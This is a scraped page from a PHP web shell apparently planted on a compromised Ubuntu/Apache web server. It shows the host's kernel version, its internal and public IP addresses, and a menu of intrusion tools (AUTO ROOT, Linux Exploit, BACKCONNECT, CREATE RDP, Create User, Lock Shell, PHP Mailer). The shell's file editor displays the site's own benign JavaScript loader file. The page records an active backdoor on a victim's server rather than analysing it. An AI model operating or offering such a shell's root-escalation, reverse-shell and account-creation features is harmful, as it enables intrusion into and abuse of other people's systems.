Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.113.24
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
bnu /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
base_file
[ DIR ]
drwxr-xr-x
MainPage.js
11.41
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
formatdate.js
12.14
KB
-rwxr-xr-x
gtransapi.js
212.95
KB
-rw-r--r--
index.js
3.17
KB
-rwxr-xr-x
jquery.browser_detect.js
832
B
-rwxr-xr-x
load_js_files.js
2.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load_js_files.js
var $loaded_js_files_arr = new Array(); function includeJsFilesMannually(js_path) { if(js_path!="" && !in_array(js_path,$loaded_js_files_arr)) { $loaded_js_files_arr.push(js_path); /* var oHead = document.getElementsByTagName('head')[0]; var oScript = document.createElement('script'); oScript.type = 'text/javascript'; oScript.charset = 'utf-8'; oScript.src = js_path; oHead.appendChild(oScript); */ $(document.createElement('script')).attr('src',js_path).attr('type', 'text/javascript').appendTo('head'); } } function includeJsFilesMannuallyByHead(js_path) { if(js_path!="" && !in_array(js_path,$loaded_js_files_arr)) { $loaded_js_files_arr.push(js_path); head.js(js_path); } } function includeCustomJs($js_path) { $js_path_arr= $js_path.split(','); for($js=0;$js<$js_path_arr.length;$js++) { var js_path_details=$js_path_arr[$js]; if(!in_array(js_path_details,$loaded_js_files_arr)) { includeJsFilesMannually(js_path_details); } } } $load_frame_work_supported_file=0; function IncludeFrameWorkSupportFiles() { if($load_frame_work_supported_file==0) { var modules = [ { include: true, incfile:'custom_js/preCustomGridEditValidation.js'}, { include: true, incfile:'custom_js/PreSaveModuleValidation.js'}, { include: true, incfile:'custom_js/gandhiGridValidation.js'}, { include: true, incfile:'custom_js/gandhi_grid.js'}, { include: true, incfile:'custom_js/postSaveSchemaGroupDetails.js'}, { include: true, incfile:'js/form_submit.js'}, { include: true, incfile:'js/upload_details.js'}, { include: true, incfile:'js/openPopUp.js'}, { include: true, incfile:'js/formatdate.js'}, { include: true, incfile:'js/MainPageFrameWork.js'}, { include: true, incfile:'js/validate.js'}, { include: true, incfile:'custom_js/gandhi_grid.js'}, { include: true, incfile:'custom_js/include_js.js'}, { include: true, incfile:'js/inline_grid_edit.js'}, { include: true, incfile:'custom_js/pre_inline_grid_edit.js'}, { include: true, incfile:'custom_js/module_task.js'}, { include: true, incfile:'custom_js/PreMultipleSaveValidation.js'}, { include: true, incfile:'custom_js/appraisal.js'} ]; var filename; for(var i=0;i<modules.length; i++) { if(modules[i].include === true) { filename = modules[i].incfile; head.js(filename); } } $load_frame_work_supported_file=1; } } function enableTransactionSeries() { head.js("js/transaction_series.js",function(){CallenableTransactionSeries('Add')}); }
Close